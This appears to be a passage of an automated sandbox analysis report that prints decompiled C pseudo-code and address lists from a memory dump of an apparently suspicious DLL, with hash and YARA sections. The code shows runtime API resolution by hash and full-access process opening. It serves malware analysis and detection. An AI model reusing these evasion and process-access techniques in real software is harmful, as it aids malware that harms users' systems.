				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0xdba36f91;
				asm("movq [ecx+0x18], xmm0");
				E6ED8F828( &_v312, E6ED8F4CC(_t418) + 0x10);
				E6ED8F4BC( &_v316, E6ED8F4CC( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0x2d1ecde3;
				asm("movq [ecx+0x18], xmm0");
				E6ED8F828( &_v320, E6ED8F4CC(_t422) + 0x10);
				E6ED8F4BC( &_v324, E6ED8F4CC( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E6ED8B9FC(_t154,  *_t480);
				E6ED8F4BC( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0");
				E6ED8F4BC( &_v344, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E6ED8F4BC( &_v348, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E6ED8F4BC( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E6ED8F654( &_v316);
				return E6ED8F654( &_v356);
			}

0x6ed81494
0x6ed81498
0x6ed8149d
0x6ed814a3
0x6ed814ab
0x6ed814b0
0x6ed814bc
0x6ed814c0
0x6ed814d2
0x6ed814e8
0x6ed814f3
0x6ed814f4
0x6ed814f5
0x6ed814f6
0x6ed814f7
0x6ed814fa
0x6ed814fe
0x6ed81502
0x6ed81509
0x6ed8151b
0x6ed81531
0x6ed8153c
0x6ed8153d
0x6ed8153e
0x6ed8153f
0x6ed81540
0x6ed81543
0x6ed81547
0x6ed8154b
0x6ed81552
0x6ed81564
0x6ed8157a
0x6ed81585
0x6ed81586
0x6ed81587
0x6ed81588
0x6ed81589
0x6ed8158c
0x6ed81590
0x6ed81594
0x6ed8159b
0x6ed815ad
0x6ed815c3
0x6ed815ce
0x6ed815cf
0x6ed815d0
0x6ed815d1
0x6ed815d2
0x6ed815d5
0x6ed815d9
0x6ed815dd
0x6ed815e4
0x6ed815f6
0x6ed8160c
0x6ed81617
0x6ed81618
0x6ed81619
0x6ed8161a
0x6ed8161b
0x6ed8161e
0x6ed81622
0x6ed81626
0x6ed8162d
0x6ed8163f
0x6ed81655
0x6ed81660
0x6ed81661
0x6ed81662
0x6ed81663
0x6ed81664
0x6ed81667
0x6ed8166b
0x6ed8166f
0x6ed81676
0x6ed81688
0x6ed8169e
0x6ed816a9
0x6ed816aa
0x6ed816ab
0x6ed816ac
0x6ed816ad
0x6ed816b0
0x6ed816b4
0x6ed816b8
0x6ed816bf
0x6ed816d1
0x6ed816e7
0x6ed816f2
0x6ed816f3
0x6ed816f4
0x6ed816f5
0x6ed816f6
0x6ed816f9
0x6ed816fd
0x6ed81701
0x6ed81708
0x6ed8171a
0x6ed81730
0x6ed8173b
0x6ed8173c
0x6ed8173d
0x6ed8173e
0x6ed8173f
0x6ed81742
0x6ed81746
0x6ed8174a
0x6ed81751
0x6ed81763
0x6ed81779
0x6ed81784
0x6ed81785
0x6ed81786
0x6ed81787
0x6ed81788
0x6ed8178b
0x6ed8178f
0x6ed81793
0x6ed8179a
0x6ed817ac
0x6ed817c2
0x6ed817cd
0x6ed817ce
0x6ed817cf
0x6ed817d0
0x6ed817d1
0x6ed817d4
0x6ed817d8
0x6ed817dc
0x6ed817e3
0x6ed817f5
0x6ed8180b
0x6ed81816
0x6ed81817
0x6ed81818
0x6ed81819
0x6ed8181a
0x6ed8181d
0x6ed81821
0x6ed81825
0x6ed8182c
0x6ed8183e
0x6ed81854
0x6ed8185f
0x6ed81860
0x6ed81861
0x6ed81862
0x6ed81863
0x6ed81866
0x6ed8186a
0x6ed8186e
0x6ed81875
0x6ed81887
0x6ed8189d
0x6ed818a8
0x6ed818a9
0x6ed818aa
0x6ed818ab
0x6ed818ac
0x6ed818af
0x6ed818b3
0x6ed818b7
0x6ed818be
0x6ed818d0
0x6ed818e6
0x6ed818f1
0x6ed818f2
0x6ed818f3
0x6ed818f4
0x6ed818f5
0x6ed818f8
0x6ed818fc
0x6ed81900
0x6ed81907
0x6ed81919
0x6ed8192f
0x6ed8193a
0x6ed8193b
0x6ed8193c
0x6ed8193d
0x6ed8193e
0x6ed81941
0x6ed81945
0x6ed81949
0x6ed81950
0x6ed81962
0x6ed81978
0x6ed81983
0x6ed81984
0x6ed81985
0x6ed81986
0x6ed8198c
0x6ed8198f
0x6ed81991
0x6ed8199c
0x6ed819a3
0x6ed819ac
0x6ed819b4
0x6ed819bb
0x6ed819c4
0x6ed819cc
0x6ed819d3
0x6ed819dc
0x6ed819e4
0x6ed819eb
0x6ed819f4
0x6ed819fc
0x6ed81a03
0x6ed81a0c
0x6ed81a14
0x6ed81a1b
0x6ed81a24
0x6ed81a2c
0x6ed81a36
0x6ed81a3f
0x6ed81a47
0x6ed81a51
0x6ed81a5a
0x6ed81a62
0x6ed81a6c
0x6ed81a75
0x6ed81a7d
0x6ed81a87
0x6ed81a90
0x6ed81a98
0x6ed81aa2
0x6ed81aab
0x6ed81ab3
0x6ed81abd
0x6ed81ac6
0x6ed81ace
0x6ed81ad8
0x6ed81ae1
0x6ed81ae9
0x6ed81af3
0x6ed81afc
0x6ed81b04
0x6ed81b0e
0x6ed81b17
0x6ed81b1f
0x6ed81b26
0x6ed81b2f
0x6ed81b37
0x6ed81b3e
0x6ed81b43
0x6ed81b51
0x6ed81b55
0x6ed81b64
0x6ed81b6d
0x6ed81b72
0x6ed81b79
0x6ed81b7d
0x6ed81b81
0x6ed81b88
0x6ed81b9a
0x6ed81bb0
0x6ed81bbb
0x6ed81bbc
0x6ed81bbd
0x6ed81bbe
0x6ed81bbf
0x6ed81bc2
0x6ed81bc6
0x6ed81bca
0x6ed81bd1
0x6ed81be3
0x6ed81bf9
0x6ed81c04
0x6ed81c05
0x6ed81c06
0x6ed81c07
0x6ed81c08
0x6ed81c0b
0x6ed81c0f
0x6ed81c13
0x6ed81c1a
0x6ed81c2c
0x6ed81c42
0x6ed81c4d
0x6ed81c4e
0x6ed81c4f
0x6ed81c50
0x6ed81c51
0x6ed81c54
0x6ed81c58
0x6ed81c5c
0x6ed81c63
0x6ed81c75
0x6ed81c8b
0x6ed81c96
0x6ed81c97
0x6ed81c98
0x6ed81c99
0x6ed81c9a
0x6ed81c9d
0x6ed81ca0
0x6ed81ca1
0x6ed81ca2
0x6ed81ca9
0x6ed81cac
0x6ed81cb7
0x6ed81cbe
0x6ed81cc7
0x6ed81ccf
0x6ed81cd6
0x6ed81cdf
0x6ed81ce7
0x6ed81cee
0x6ed81cf7
0x6ed81cff
0x6ed81d04
0x6ed81d0d
0x6ed81d15
0x6ed81d2a

Strings

8nsK, xrefs: 6ED81900

Memory Dump Source

Source File: 00000000.00000002.627740230.000000006ED81000.00000020.00020000.sdmp, Offset: 6ED80000, based on PE: true

Associated: 00000000.00000002.627724979.000000006ED80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627787395.000000006ED9A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627811416.000000006ED9D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.627821658.000000006ED9F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 8nsK
API String ID: 0-3012451157
Opcode ID: 352d76c91212afd11de380c5d6904c807f5abc6bc6d3675186914b2ffa56fc16
Instruction ID: 3c543fd81392f214cd1a16819c866858de9adf6558d52d0bfe91dba3170589c4
Opcode Fuzzy Hash: 352d76c91212afd11de380c5d6904c807f5abc6bc6d3675186914b2ffa56fc16
Instruction Fuzzy Hash: 9932F87240470A9EC715DF64CC509DF77B8EFA1208F205F0EB5899A1A2FF71E98AC661

Uniqueness

Uniqueness Score: -1.00%

Function 6ED8A4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E6ED8A4E8(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E6ED8B658(_t439 + 0x24, _t392, 0x7fffffff);
					if(E6ED8F4D0(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E6ED8F654(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E6ED92234(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E6ED8F654(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E6ED8F584(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E6ED8F584(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x6ed9b808]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E6ED93064(0x60a28c5c, 0x14e85b34);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E6ED8F4BC( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E6ED8F4BC( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E6ED8B5C4(_t439 + 0x34);
											E6ED8B5C4(_t439 + 8);
											goto L65;
										}
										L62:
										E6ED8B5C4(_t439 + 0x34);
										E6ED8B5C4(_t439 + 8);
										goto L63;
									}
									_t392 = E6ED8F4BC(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E6ED8CA8C(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E6ED8C280(_t324);
									if(__eflags != 0) {
										break;
									}
									E6ED8F828(_t439 + 0x14, E6ED8F4CC(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E6ED8F4BC(_t439 + 0x14, E6ED8F4CC(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E6ED93064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E6ED8F828(_t439 + 0x40, E6ED8F4CC(_t439 + 0x3c) + 4);
											 *(E6ED8F4BC(_t439 + 0x40, E6ED8F4CC(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E6ED8CD24(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E6ED8F4BC( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E6ED8F4BC(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E6ED8AC48(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E6ED8CD24(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E6ED8F4BC( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E6ED8F4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E6ED8F4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E6ED8F4BC( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E6ED8F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E6ED938F0( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E6ED8F4CC( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E6ED8F828( *((intOrPtr*)(_t439 + 8)), E6ED8F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E6ED8F4CC( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E6ED8F4CC( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E6ED8F4BC( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E6ED8F4BC( *((intOrPtr*)(_t439 + 4)), _t413);
										E6ED938F0(_t243,  *((intOrPtr*)(_t439 + 0x98)), E6ED8F4CC( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E6ED8F828( *((intOrPtr*)(_t439 + 4)), E6ED8F4CC( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E6ED8F828( *((intOrPtr*)(_t439 + 8)), E6ED8F4CC( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E6ED8F4BC( *((intOrPtr*)(_t439 + 8)), E6ED8F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E6ED8F828( *((intOrPtr*)(_t439 + 4)), E6ED8F4CC( *_t439) + 4);
								 *(E6ED8F4BC( *((intOrPtr*)(_t439 + 4)), E6ED8F4CC( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E6ED8F4BC(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E6ED93064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E6ED8F4BC(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E6ED8F828( *((intOrPtr*)(_t439 + 8)), E6ED8F4CC( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E6ED8F4BC( *((intOrPtr*)(_t439 + 8)), E6ED8F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E6ED8F4BC(_t439 + 0x28,  *(_t439 + 0x70));
										E6ED8F828( *((intOrPtr*)(_t439 + 4)), E6ED8F4CC( *_t439) + 4);
										 *(E6ED8F4BC( *((intOrPtr*)(_t439 + 4)), E6ED8F4CC( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6ED8F4BC( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E6ED8F4BC( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E6ED8F4CC( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E6ED8F4CC( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E6ED8F4BC( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E6ED8F4BC( *((intOrPtr*)(_t439 + 4)), _t420);
										E6ED938F0( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E6ED8F4CC( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E6ED8F828( *((intOrPtr*)(_t439 + 4)), E6ED8F4CC( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E6ED93064(0x60a28c5c, 0xe96b154c);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E6ED8F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E6ED8F4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E6ED8F4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E6ED8F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E6ED8F4BC( *((intOrPtr*)(_t439 + 8)), _t422);
										E6ED938F0( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E6ED8F4CC( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E6ED8F828( *((intOrPtr*)(_t439 + 8)), E6ED8F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6ED8F4BC(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x6ed8a4f2
0x6ed8a4f4
0x6ed8a4ff
0x6ed8a505
0x6ed8a509
0x6ed8a50e
0x6ed8a514
0x6ed8a524
0x00000000
0x6ed8a526
0x6ed8a526
0x6ed8a531
0x6ed8a531
0x6ed8aaaf
0x6ed8aab1
0x6ed8aab2
0x6ed8aaf1
0x6ed8aaf5
0x6ed8ab03
0x6ed8ab11
0x6ed8ab11
0x6ed8aafc
0x6ed8ab17
0x6ed8ab1c
0x00000000
0x6ed8ab1c
0x6ed8ab00
0x6ed8ab01
0x00000000
0x6ed8a53b
0x6ed8a53b
0x6ed8a53f
0x6ed8a646
0x6ed8a646
0x6ed8a64b
0x6ed8a75c
0x6ed8a760
0x6ed8a765
0x6ed8a769
0x6ed8a893
0x6ed8a895
0x6ed8a899
0x6ed8a8a2
0x6ed8a8ab
0x6ed8a8af
0x6ed8a8b8
0x6ed8a8bf
0x6ed8a8c0
0x6ed8a8c4
0x6ed8a8c8
0x6ed8a8cc
0x6ed8a8ce
0x6ed8aa38
0x6ed8aa38
0x6ed8aa40
0x6ed8aa58
0x6ed8aa5a
0x6ed8aa5c
0x6ed8aa96
0x6ed8aa96
0x6ed8aa98
0x6ed8aa98
0x6ed8aa9b
0x6ed8aab6
0x6ed8aaca
0x6ed8aacd
0x6ed8aad2
0x6ed8aadd
0x6ed8aade
0x6ed8aae1
0x6ed8aae3
0x6ed8aaec
0x00000000
0x6ed8aaec
0x6ed8aa9d
0x6ed8aaa1
0x6ed8aaaa
0x00000000
0x6ed8aaaa
0x6ed8aa6d
0x6ed8aa7d
0x6ed8aa81
0x6ed8aa81
0x6ed8aa84
0x6ed8aa87
0x6ed8aa8a
0x6ed8aa90
0x00000000
0x00000000
0x00000000
0x6ed8aa92
0x6ed8a8d6
0x6ed8a8d6
0x6ed8a8d8
0x6ed8a8dc
0x6ed8a8e1
0x6ed8a8e3
0x6ed8a8e7
0x6ed8a8ea
0x6ed8a8f2
0x6ed8a8f4
0x00000000
0x00000000
0x6ed8a90b
0x6ed8a926
0x6ed8a928
0x6ed8a93b
0x6ed8a93d
0x6ed8a93f
0x6ed8a95a
0x6ed8a95a
0x6ed8a95e
0x6ed8a960
0x00000000
0x00000000
0x6ed8a962
0x6ed8a965
0x6ed8a986
0x6ed8a9a5
0x6ed8a9ab
0x6ed8a9ae
0x6ed8a9b3
0x6ed8a9b4
0x6ed8a9b8
0x00000000
0x00000000
0x6ed8a9c0
0x6ed8a9c0
0x6ed8a9c2
0x6ed8a9ce
0x6ed8a9da
0x6ed8a9e4
0x6ed8a9e7
0x6ed8a9ea
0x6ed8a9ee
0x6ed8a9f5
0x6ed8a9f9
0x6ed8a9fd
0x6ed8a9fe
0x6ed8aa02
0x6ed8aa07
0x6ed8aa0c
0x6ed8aa10
0x6ed8aa14
0x6ed8aa1a
0x6ed8aa20
0x6ed8aa26
0x6ed8aa2c
0x6ed8aa31
0x6ed8aa32
0x6ed8aa32
0x00000000
0x6ed8a9c2
0x00000000
0x6ed8a965
0x6ed8a943
0x6ed8a954
0x6ed8a956
0x6ed8a958
0x00000000
0x00000000
0x00000000
0x6ed8a958
0x6ed8a96b
0x00000000
0x6ed8a96b
0x6ed8a76f
0x6ed8a772
0x6ed8a774
0x00000000
0x00000000
0x6ed8a77c
0x6ed8a77c
0x6ed8a77e
0x6ed8a77e
0x6ed8a78f
0x6ed8a791
0x6ed8a794
0x00000000
0x00000000
0x6ed8a88a
0x6ed8a88b
0x6ed8a88d
0x00000000
0x00000000
0x00000000
0x6ed8a88d
0x6ed8a79a
0x6ed8a79d
0x6ed8a7a7
0x6ed8a7ac
0x6ed8a7ae
0x6ed8a7b4
0x6ed8a7bb
0x6ed8a7bf
0x6ed8a7c4
0x6ed8a7c8
0x6ed8ac03
0x6ed8ac17
0x6ed8ac3a
0x6ed8ac3f
0x6ed8ac3f
0x6ed8a7df
0x6ed8a7e4
0x6ed8a7e4
0x6ed8a7e4
0x6ed8a7e4
0x6ed8a7ea
0x6ed8a7ef
0x6ed8a7f1
0x6ed8a7f6
0x6ed8a7fd
0x6ed8a802
0x6ed8a804
0x6ed8abc1
0x6ed8abd2
0x6ed8abec
0x6ed8abf1
0x6ed8abf1
0x6ed8a81a
0x6ed8a81f
0x6ed8a81f
0x6ed8a81f
0x6ed8a81f
0x6ed8a833
0x6ed8a851
0x6ed8a856
0x6ed8a866
0x6ed8a883
0x6ed8a885
0x6ed8a885
0x00000000
0x6ed8a79d
0x6ed8a653
0x6ed8a653
0x6ed8a655
0x6ed8a65c
0x6ed8a66a
0x6ed8a66c
0x6ed8a66f
0x6ed8a676
0x6ed8a678
0x6ed8a6a9
0x6ed8a6b8
0x6ed8a6ba
0x6ed8a6bc
0x6ed8a6da
0x6ed8a6dc
0x6ed8a6de
0x6ed8a6f1
0x6ed8a710
0x6ed8a716
0x6ed8a719
0x6ed8a730
0x6ed8a74c
0x6ed8a74e
0x6ed8a74e
0x6ed8a74e
0x6ed8a74e
0x6ed8a6de
0x00000000
0x6ed8a6bc
0x6ed8a67c
0x6ed8a67c
0x6ed8a67e
0x6ed8a68f
0x6ed8a691
0x6ed8a693
0x00000000
0x00000000
0x6ed8a69f
0x6ed8a6a0
0x6ed8a6a7
0x00000000
0x00000000
0x00000000
0x6ed8a6a7
0x6ed8a695
0x6ed8a698
0x00000000
0x00000000
0x6ed8a751
0x6ed8a751
0x6ed8a752
0x6ed8a752
0x00000000
0x6ed8a545
0x6ed8a547
0x6ed8a547
0x6ed8a549
0x6ed8a550
0x6ed8a55e
0x6ed8a560
0x6ed8a564
0x6ed8a568
0x6ed8a56a
0x6ed8a598
0x6ed8a59b
0x6ed8a5a0
0x6ed8a5a4
0x6ed8a5a9
0x6ed8a5b0
0x6ed8a5b5
0x6ed8a5b7
0x6ed8ab7e
0x6ed8ab8f
0x6ed8abaf
0x6ed8abb4
0x6ed8abb4
0x6ed8a5cd
0x6ed8a5d2
0x6ed8a5d2
0x6ed8a5d2
0x6ed8a5d2
0x6ed8a5e4
0x6ed8a5e6
0x6ed8a5e8
0x6ed8a5f9
0x6ed8a5f9
0x6ed8a5ff
0x6ed8a604
0x6ed8a608
0x6ed8a60e
0x6ed8a615
0x6ed8a61a
0x6ed8a61c
0x6ed8ab32
0x6ed8ab43
0x6ed8ab64
0x6ed8ab69
0x6ed8ab69
0x6ed8a633
0x6ed8a638
